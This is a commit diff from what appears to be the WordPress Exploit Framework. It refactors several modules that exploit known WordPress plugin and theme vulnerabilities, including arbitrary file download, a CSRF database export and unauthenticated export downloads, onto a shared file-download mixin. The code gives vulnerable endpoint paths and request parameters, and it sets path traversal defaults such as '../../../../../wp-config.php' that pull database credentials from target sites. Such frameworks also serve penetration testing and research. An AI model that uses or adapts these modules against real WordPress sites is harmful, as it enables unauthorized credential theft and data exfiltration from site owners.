rastating
diff --git a/‎lib/wpxf/wordpress/file_download.rb‎
Lines changed: 7 additions & 2 deletions b/‎lib/wpxf/wordpress/file_download.rb‎
Lines changed: 7 additions & 2 deletions
diff --git a/‎modules/auxiliary/all_in_one_migration_export.rb‎
Lines changed: 8 additions & 5 deletions b/‎modules/auxiliary/all_in_one_migration_export.rb‎
Lines changed: 8 additions & 5 deletions
diff --git a/‎modules/auxiliary/antioch_arbitrary_file_download.rb‎
Lines changed: 7 additions & 62 deletions b/‎modules/auxiliary/antioch_arbitrary_file_download.rb‎
Lines changed: 7 additions & 62 deletions
diff --git a/‎modules/auxiliary/cp_image_store_arbitrary_file_download.rb‎
Lines changed: 8 additions & 5 deletions b/‎modules/auxiliary/cp_image_store_arbitrary_file_download.rb‎
Lines changed: 8 additions & 5 deletions
diff --git a/‎modules/auxiliary/duplicator_csrf_db_export.rb‎
Lines changed: 7 additions & 4 deletions b/‎modules/auxiliary/duplicator_csrf_db_export.rb‎
Lines changed: 7 additions & 4 deletions
diff --git a/‎modules/auxiliary/ghost_unrestricted_export_download.rb‎
Lines changed: 2 additions & 1 deletion b/‎modules/auxiliary/ghost_unrestricted_export_download.rb‎
Lines changed: 2 additions & 1 deletion
diff --git a/‎modules/auxiliary/history_collection_arbitrary_file_download.rb‎
Lines changed: 9 additions & 6 deletions b/‎modules/auxiliary/history_collection_arbitrary_file_download.rb‎
Lines changed: 9 additions & 6 deletions
diff --git a/‎modules/auxiliary/imdb_profile_widget_arbitrary_file_download.rb‎
Lines changed: 7 additions & 62 deletions b/‎modules/auxiliary/imdb_profile_widget_arbitrary_file_download.rb‎
Lines changed: 7 additions & 62 deletions
@@ -18,11 +18,15 @@ def initialize
       StringOption.new(
         name: 'export_path',
         desc: 'The path to save the file to',
-        required: false
+        required: export_path_required
       )
     ])
   end
 
+  def export_path_required
+    false
+  end
+
   # @return [String] the working directory of the vulnerable file.
   def working_directory
     nil
@@ -60,7 +64,8 @@ def remote_file
 
   # @return [String] the path to save the file to.
   def export_path
-    normalized_option_value('export_path')
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   # Run the module.
 
@@ -6,9 +6,11 @@ def initialize
 
     update_info(
       name: 'All-in-One Migration Export',
-      desc: 'This module allows you to export WordPress data (such as the '\
-            'database, plugins, themes, uploaded files, etc) via the '\
-            'All-in-One Migration plugin in versions < 2.0.5.',
+      desc: %(
+        This module allows you to export WordPress data (such as the
+        database, plugins, themes, uploaded files, etc) via the
+        All-in-One Migration plugin in versions < 2.0.5.
+      ),
       author: [
         'James Golovich',                  # Disclosure
         'Rob Carr <rob[at]rastating.com>'  # WPXF module
@@ -40,7 +42,8 @@ def check
   end
 
   def export_path
-    normalized_option_value('export_path')
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   def run
@@ -66,6 +69,6 @@ def run
     end
 
     emit_success "Saved export to #{export_path}"
-    return true
+    true
   end
 end
@@ -1,14 +1,11 @@
 class Wpxf::Auxiliary::AntiochArbitraryFileDownload < Wpxf::Module
-  include Wpxf
+  include Wpxf::WordPress::FileDownload
 
   def initialize
     super
 
     update_info(
       name: 'Antioch Theme Arbitrary File Download',
-      desc: 'This module exploits a vulnerability in the Antioch theme '\
-            'which allows you to download any arbitrary file accessible '\
-            'by the user the web server is running as.',
       author: [
         'Ashiyane Digital Security Team',  # Disclosure
         'Rob Carr <rob[at]rastating.com>'  # WPXF module
@@ -18,77 +15,25 @@ def initialize
       ],
       date: 'Sep 08 2014'
     )
-
-    register_options([
-      StringOption.new(
-        name: 'remote_file',
-        desc: 'The path to the remote file (relative to /wp-content/themes/antioch/lib/scripts/)',
-        required: true,
-        default: '../../../../../wp-config.php'
-      ),
-      StringOption.new(
-        name: 'export_path',
-        desc: 'The file to save the file to',
-        required: false
-      )
-    ])
   end
 
   def check
     check_theme_version_from_style('antioch')
   end
 
-  def remote_file
-    normalized_option_value('remote_file')
+  def default_remote_file_path
+    '../../../../../wp-config.php'
   end
 
-  def export_path
-    normalized_option_value('export_path')
+  def working_directory
+    'wp-content/themes/antioch/lib/scripts/'
   end
 
   def downloader_url
     normalize_uri(wordpress_url_themes, 'antioch', 'lib', 'scripts', 'download.php')
   end
 
-  def request_file
-    if export_path.nil?
-      emit_info 'Requesting file...'
-      return execute_get_request(
-        url: downloader_url,
-        params: { 'file' => remote_file }
-      )
-    else
-      emit_info 'Downloading file...'
-      return download_file(
-        url: downloader_url,
-        method: :get,
-        params: { 'file' => remote_file },
-        local_filename: export_path
-      )
-    end
-  end
-
-  def run
-    return false unless super
-
-    res = request_file
-
-    if res.nil? || res.timed_out?
-      emit_error 'Request timed out, try increasing the http_client_timeout'
-      return false
-    end
-
-    if res.code != 200
-      emit_error "Server responded with code #{res.code}"
-      return false
-    end
-
-    if export_path.nil?
-      emit_success "Result: \n#{res.body}"
-    else
-      emit_success "Downlaoded file to #{export_path}"
-    end
-
-    true
+  def download_request_params
+    { 'file' => remote_file }
   end
 end
@@ -6,9 +6,11 @@ def initialize
 
     update_info(
       name: 'CP Image Store Arbitrary File Download',
-      desc: 'This module exploits a vulnerability in version 1.0.5 of the CP '\
-            'Image Store plugin which allows you to download any arbitrary '\
-            'file accessible by the user the web server is running as.',
+      desc: %(
+        This module exploits a vulnerability in version 1.0.5 of the CP
+        Image Store plugin which allows you to download any arbitrary
+        file accessible by the user the web server is running as.
+      ),
       author: [
         'Joaquin Ramirez Martinez',        # Disclosure
         'Rob Carr <rob[at]rastating.com>'  # WPXF module
@@ -53,7 +55,8 @@ def remote_file
   end
 
   def export_path
-    normalized_option_value('export_path')
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   def run
@@ -107,6 +110,6 @@ def run
       end
     end
 
-    return true
+    true
   end
 end
@@ -7,9 +7,11 @@ def initialize
 
     update_info(
       name: 'Duplicator <= 1.1.3 CSRF Database Export',
-      desc: 'This module exploits a cross-site request forgery vulnerability found '\
-            'in Duplicator <= 1.1.3 which will create a database export when a user '\
-            'visits the generated web page.',
+      desc: %(
+        This module exploits a cross-site request forgery vulnerability found
+        in Duplicator <= 1.1.3 which will create a database export when a user
+        visits the generated web page.
+      ),
       author: [
         'RatioSec Research',              # Discovery and disclosure
         'Rob Carr <rob[at]rastating.com>' # WPXF module
@@ -48,7 +50,8 @@ def check
   end
 
   def export_path
-    datastore['export_path']
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   def complete_path
 
@@ -39,7 +39,8 @@ def check
   end
 
   def export_path
-    normalized_option_value('export_path')
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   def download_url
 
@@ -6,9 +6,11 @@ def initialize
 
     update_info(
       name: 'History Collection Arbitrary File Download',
-      desc: 'This module exploits a vulnerability in all versions of the '\
-            'History Collection plugin which allows you to download any arbitrary '\
-            'file accessible by the user the web server is running as.',
+      desc: %(
+        This module exploits a vulnerability in all versions of the
+        History Collection plugin which allows you to download any arbitrary
+        file accessible by the user the web server is running as.
+      ),
       author: [
         'Kuroi\'SH',                      # Disclosure
         'Rob Carr <rob[at]rastating.com>' # WPXF module
@@ -43,7 +45,8 @@ def remote_file
   end
 
   def export_path
-    normalized_option_value('export_path')
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   def downloader_url
@@ -89,9 +92,9 @@ def run
         emit_success "Result: \n#{res.body}"
       end
     else
-      emit_success "Downlaoded file to #{export_path}"
+      emit_success "Downloaded file to #{export_path}"
     end
 
-    return true
+    true
   end
 end
@@ -1,14 +1,11 @@
 class Wpxf::Auxiliary::ImdbProfileWidgetArbitraryFileDownload < Wpxf::Module
-  include Wpxf
+  include Wpxf::WordPress::FileDownload
 
   def initialize
     super
 
     update_info(
       name: 'IMDb Profile Widget <= 1.0.8 Arbitrary File Download',
-      desc: 'This module exploits a vulnerability in the IMDb Profile Widget plugin '\
-            'which allows you to download any arbitrary file accessible '\
-            'by the user the web server is running as.',
       author: [
         'CrashBandicot @DosPerl',          # Disclosure
         'Rob Carr <rob[at]rastating.com>'  # WPXF module
@@ -19,77 +16,25 @@ def initialize
       ],
       date: 'Mar 26 2016'
     )
-
-    register_options([
-      StringOption.new(
-        name: 'remote_file',
-        desc: 'The path to the remote file (relative to /wp-content/plugins/imdb-widget/)',
-        required: true,
-        default: '../../../wp-config.php'
-      ),
-      StringOption.new(
-        name: 'export_path',
-        desc: 'The file to save the file to',
-        required: false
-      )
-    ])
   end
 
   def check
     check_plugin_version_from_readme('imdb-widget', '1.0.9')
   end
 
-  def remote_file
-    normalized_option_value('remote_file')
+  def working_directory
+    'wp-content/plugins/imdb-widget/'
   end
 
-  def export_path
-    normalized_option_value('export_path')
+  def default_remote_file_path
+    '../../../wp-config.php'
   end
 
   def downloader_url
     normalize_uri(wordpress_url_wp_content, 'plugins', 'imdb-widget', 'pic.php')
   end
 
-  def request_file
-    if export_path.nil?
-      emit_info 'Requesting file...'
-      return execute_get_request(
-        url: downloader_url,
-        params: { 'url' => remote_file }
-      )
-    else
-      emit_info 'Downloading file...'
-      return download_file(
-        url: downloader_url,
-        method: :get,
-        params: { 'url' => remote_file },
-        local_filename: export_path
-      )
-    end
-  end
-
-  def run
-    return false unless super
-
-    res = request_file
-
-    if res.nil? || res.timed_out?
-      emit_error 'Request timed out, try increasing the http_client_timeout'
-      return false
-    end
-
-    if res.code != 200
-      emit_error "Server responded with code #{res.code}"
-      return false
-    end
-
-    if export_path.nil?
-      emit_success "Result: \n#{res.body}"
-    else
-      emit_success "Downlaoded file to #{export_path}"
-    end
-
-    true
+  def download_request_params
+    { 'url' => remote_file }
   end
 end